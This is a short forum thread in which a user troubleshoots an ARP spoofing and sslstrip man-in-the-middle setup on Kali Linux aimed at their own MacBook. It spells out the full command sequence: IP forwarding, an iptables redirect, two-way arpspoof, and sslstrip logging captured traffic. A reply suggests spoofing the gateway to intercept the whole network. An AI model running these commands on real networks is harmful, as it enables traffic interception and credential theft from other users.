Jump to content

Can't get ARP Spoofing working


resentic

Recommended Posts

I have installed Kali Linux x32 on Virtualware. When I try and ARP Spoof my macbook it just says "Resolving host..."


This is the method I use:

1) echo 1 > /proc/sys/net/ipv4/ip_forward

2) iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

3) arpspoof -i <interface> -t <target IP> <gateway IP>

4) arpspoof -i <interface> -t <gateway IP> <target IP>

5) sslstrip -k -l 8080 -w /root/Desktop/sslstrip.log

6) tail -F /root/Desktop/sslstrip.log


I can't connect to any websties on my macbook. What am I doing wrong?

Link to comment
Share on other sites

Is your IP address on the same network in the VM as that of your Macbook (which is presumably connected to your router). In other words: did you use bridged mode or NAT mode in the VM?

Also, I don't see why you are using 3) and 4). Try: arpspoof -i interface gateway_IP (this should intercept all IP addresses that send traffic to the router).

Edited by michael_kent123
Link to comment
Share on other sites

Is your IP address on the same network in the VM as that of your Macbook (which is presumably connected to your router). In other words: did you use bridged mode or NAT mode in the VM?

I have now installed Kali on my hard drive so they're definitely on the same network.

Also, I don't see why you are using 3) and 4). Try: arpspoof -i interface gateway_IP (this should intercept all IP addresses that send traffic to the router).

I only want to intercept traffic from my mac not the whole network.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...